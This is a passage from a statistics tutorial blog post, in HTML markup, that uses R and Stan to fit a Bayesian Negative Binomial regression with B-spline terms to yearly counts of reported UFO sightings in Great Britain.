&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; Pinehurst night Saw multi color object above horizon.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; Rapid City nautical dusk An object &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the shape of a straight line about an …
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; Cleveland night Tone &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the air.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; Bloomington afternoon Black tic&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;tac shaped ufo. Moved with insane speed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; Irvine night Two alien were scanning me
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; Moore morning Long cigar solid shaped craft with light beam
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="what-do-we-want-to-achieve"&gt;What do we want to achieve?&lt;/h2&gt;
&lt;p&gt;The goal here is to fit a simple Bayesian model which will allow us to understand the historical counts of reported UFO sightings. The Bayesian approach to modelling is a probabilistic approach to modelling that has some advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;we are able to incorporate meaningful prior information about model parameters&lt;/li&gt;
&lt;li&gt;including uncertainty in our predictions is natural and automatic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A common drawback of Bayesian methods is the lack of fast and simple-to-use software to fit such models. With modern tools such as &lt;a href="https://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt;, fitting Bayesian models is less of a headache!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re going to use Stan to fit our model, but I&amp;rsquo;ll be sparing you the details of the program, as well as many other details &amp;mdash; we&amp;rsquo;ve linked to a Github repo at the end of this post with full analysis scripts. The purpose of this post is to give a high level overview of how we can fit flexible regression models for count data using Stan. We also touch upon how to work with Markov chain Monte Carlo (MCMC) output within a {tidyverse} framework towards the end of this post.&lt;/p&gt;
&lt;h3 id="what-is-stan"&gt;What is Stan?&lt;/h3&gt;
&lt;p&gt;Stan is a free, open source, C++ program used for specifying and fitting Bayesian models. Stan uses state of the art MCMC algorithms to fit your Bayesian models, thus is efficient and numerically stable. We don&amp;rsquo;t really have the time to delve too much into the reasons for using Stan today, but &lt;a href="https://www.jumpingrivers.com/blog/why-stan/" rel="external"&gt;this previous post&lt;/a&gt; goes into considerable detail! If you&amp;rsquo;ve used &lt;a href="https://mcmc-jags.sourceforge.io/" rel="external"&gt;JAGS&lt;/a&gt; or &lt;a href="https://www.pymc.io/projects/docs/en/v3/index.html" rel="external"&gt;PyMC3&lt;/a&gt; before, the concept behind Stan is similar; you specify your Bayesian model in the Stan language, and Stan takes care of the MCMC algorithm for you. Installing Stan is simple in R; calling&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;, dependencies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;will install Stan for you (as well as the {rstan} package).&lt;/p&gt;
&lt;h3 id="a-note-on-how-to-interpret-the-analysis"&gt;A note on how to interpret the analysis&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s definitely worth stating up front that the purpose of this post is to have a little play with Stan and a fun data set. This data set contains &lt;em&gt;reported UFO sightings&lt;/em&gt;, they&amp;rsquo;re not &lt;em&gt;confirmed UFO sightings&lt;/em&gt;. Therefore, we can only make statements about &lt;em&gt;reports&lt;/em&gt; and not the &lt;em&gt;numbers of UFOs&lt;/em&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-ufo-counts"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="lets-take-a-peek-at-the-data"&gt;Let&amp;rsquo;s take a peek at the data&lt;/h3&gt;
&lt;p&gt;Prior to modelling the yearly counts, we should have a little look at the data. This can help us make informed modelling choices later down the line.&lt;/p&gt;
&lt;p&gt;The number of sightings per year isn&amp;rsquo;t directly recorded in this data, but we can wrangle this out of the raw data with a few {dplyr} commands. We also only look at the GB data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sights_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(country_code &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GB&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year_of_sighting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(reported_date_time)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sightings_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(year_of_sighting),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year_of_sighting&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;complete&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_sighting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;full_seq&lt;/span&gt;(year_of_sighting, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(sightings_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;ve now got annual counts of the number of global sightings. The first date in the data set is 1938, so the counts start from then.&lt;/p&gt;
&lt;p&gt;Okay, let&amp;rsquo;s plot the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sights_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year of reported sighting&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of recorded sightings per year&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Yearly UFO sighting reports for Great Britain&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="count.png" alt="A scatter plot (time series) showing the number of reported UFO sightings (worldwide) from the year 1943 to 2023. Up until about 1990, the number of reports is small (usually under 10), and approximately constant. From the early 1990s, the number rises quickly to a peak of about 150 reports in 2009, as the counts increase, so does their scatter. The numbers then rapidly fall, with there being under 25 reports in 2022." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;There are a few interesting features of the data set:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The data produces a complex pattern; this might be tricky to model!&lt;/li&gt;
&lt;li&gt;The number of reports pre 2000 was generally small.&lt;/li&gt;
&lt;li&gt;The number of reports increases from roughly the year 1995 until the late 2000s.&lt;/li&gt;
&lt;li&gt;From 2010 onward, the number of reports is in rapid decline.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To be honest, I&amp;rsquo;m not really sure why we see a rapid increase of sightings from the mid 90s onwards. There are a few &lt;em&gt;potential&lt;/em&gt; reasons for this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;There was an increase in UFO traffic over Earth from the mid 1990s to 2010 (maybe 👽)&lt;/li&gt;
&lt;li&gt;The emergence of the internet brought like-minded people together, improving the ease of reporting (plausible)&lt;/li&gt;
&lt;li&gt;The 1996 blockbuster &lt;em&gt;Independence Day&lt;/em&gt; had some kind of effect on people (plausible)&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="the-statistical-approach"&gt;The statistical approach&lt;/h2&gt;
&lt;p&gt;Our approach here will be to model the number of UFO sighting reports over time with a Negative Binomial regression model, using spline terms to flexibly model the non-linear trend. This wasn&amp;rsquo;t the first idea I had, but after a little bit of frustration, contemplation and iteration, this gave a reasonably good fit to the data.&lt;/p&gt;
&lt;p&gt;Some previous approaches (we won&amp;rsquo;t delve into the details) involved simpler Poisson models.&lt;/p&gt;
&lt;p&gt;The statistical model is as follows:&lt;/p&gt;
&lt;p&gt;\( y\mid \lambda(X) \sim \text{NegBin} (\lambda(X), \phi) \)&lt;/p&gt;
&lt;p&gt;\( \log \lambda(X) = \alpha + X\beta \)&lt;/p&gt;
&lt;p&gt;Where \(y\) is the number of sightings, \(X\) is a matrix of spline terms (derived from the times at which sightings were observed), \(\lambda(X)\) is the expected number of sightings and \(\phi \) is a dispersion parameter. A model block in Stan for this statistical model might look a bit like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;// Stan model block
model {
// likelihood
y ~ neg_binomial_2_log(alpha + X * beta, exp(log_phi));
// prior
alpha ~ normal(m_alpha, s_alpha); // intercept
beta ~ normal(m_beta, s_beta); // spline coefficients
log_phi ~ normal(m_phi, s_phi); // log dispersion term
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There&amp;rsquo;s quite a bit going on here. Let&amp;rsquo;s break the model down a little:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;neg_binomial_2_log&lt;/code&gt; distribution is used to specify the likelihood. This is an alternative parameterisation of the Negative Binomial distribution; the first parameter of &lt;code&gt;neg_binomial_2_log&lt;/code&gt; is \( \log {E (y \mid X, \alpha, \beta, \phi)} \), the second parameter is simply &lt;code&gt;phi&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;2&lt;/code&gt; in &lt;code&gt;neg_binomial_2_log&lt;/code&gt; tells us that this distribution is parameterised by the mean and dispersion (rather than by the shape and scale parameters).&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;log&lt;/code&gt; tells us that we&amp;rsquo;re actually parameterising by the log mean, rather than raw mean.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;alpha&lt;/code&gt; is an intercept term (for a linear predictor); &lt;code&gt;beta&lt;/code&gt; is a vector of regression coefficients.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In our approach, we&amp;rsquo;re going to use R to generate spline terms for us, then pass these spline terms to Stan (and thus populate &lt;code&gt;X&lt;/code&gt;). If you&amp;rsquo;re unfamilliar with splines, they&amp;rsquo;re clever devices which allow us to model non-linear behaviour. This &lt;a href="https://cran.r-project.org/web/packages/crs/vignettes/spline_primer.pdf" rel="external"&gt;crs vignette&lt;/a&gt; provides an introduction. Another approach would be to write a Stan function to construct the splines, &lt;a href="https://mc-stan.org/users/documentation/case-studies/splines_in_stan.html" rel="external"&gt;as in this Stan case study&lt;/a&gt;. The advantage of the approach we&amp;rsquo;ve taken is that splines are not a hard coded feature of the model, so we &lt;em&gt;could&lt;/em&gt; use this Stan program for a more general Negative Binomial regression. The downside is, if someone used this Stan model as part of a workflow not performed with R, we would have to carefully verify that splines have been constructed in the same way as the R implementation.&lt;/p&gt;
&lt;h2 id="constructing-the-splines"&gt;Constructing the Splines&lt;/h2&gt;
&lt;p&gt;From a data preparation perspective, the trickiest thing is probably constructing the B spline basis functions (the other parts of our Stan program can simply be specified). However, the &lt;code&gt;bs()&lt;/code&gt; function from the {splines} package takes the hard work out of this. The following function call constructs our splines for us; we&amp;rsquo;ve specified that we want to use 10 &amp;lsquo;knots&amp;rsquo; which are a part of the specification of our spline terms. We could try many numbers of knots and use model selection methods to pick the best number (or even model averaging methods), but we later see that 10 knots provides a reasonable fit of the data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;splines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;year_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year_of_sighting)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;B &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bs&lt;/span&gt;(sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year_of_sighting,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; knots &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_range[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_range[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; degree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; intercept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we&amp;rsquo;ve done this, we&amp;rsquo;re basically ready to run our Stan program. All we need to do is collect all of our data together in a list, we&amp;rsquo;ve called this &lt;code&gt;stan_data&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="performing-the-inferences"&gt;Performing the inferences&lt;/h2&gt;
&lt;p&gt;To perform our inferences, we&amp;rsquo;re going to use Stan with help from {rstan}. {rstan} provides an interface to Stan from R, as well as some other handy features like plotting functions. A bit of trial and error led me to use a thinning factor of 10 in the MCMC scheme, and a warmup period of 1000 proved to be adequate, so we&amp;rsquo;ll use these numbers again, and aim to have 4 (approximately) unautocorrelated chains of length 5000. If you&amp;rsquo;ve never used MCMC methods before, we typically specify a warmup (or &amp;ldquo;burn in&amp;rdquo;) period to account for the fact that an MCMC chain must &amp;ldquo;converge&amp;rdquo; to the region of high posterior density, from the chains starting point. The thinning factor is used to account for the fact the Markov chains exhibit a dependence structure (like a time series might), if we keep only every &lt;code&gt;thin&lt;/code&gt;-th iteration, we can reduce, or even eliminate, the autocorrelation in the chain. These steps allow us to better assess the quality of the MCMC scheme and also reduce computational overheads. If we didn&amp;rsquo;t thin, and kept the warmup period, we can end up with a very memory-intensive MCMC chain.&lt;/p&gt;
&lt;p&gt;This is achieved with the following code. Our Stan program is in the file &lt;code&gt;stan/nbin_reg.stan&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(mc.cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;## run chains in parallel (using 4 cores)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;total_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; target_iter
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;K &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ncol&lt;/span&gt;(B)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;stan_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(sights_per_year),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; K &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; K,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;sightings_per_year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; X &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; B,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# priors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, K),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, K),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_phi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_phi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stan&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stan/nbin_reg.stan&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stan_data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; chains &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; total_iter,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; warmup,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; thin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
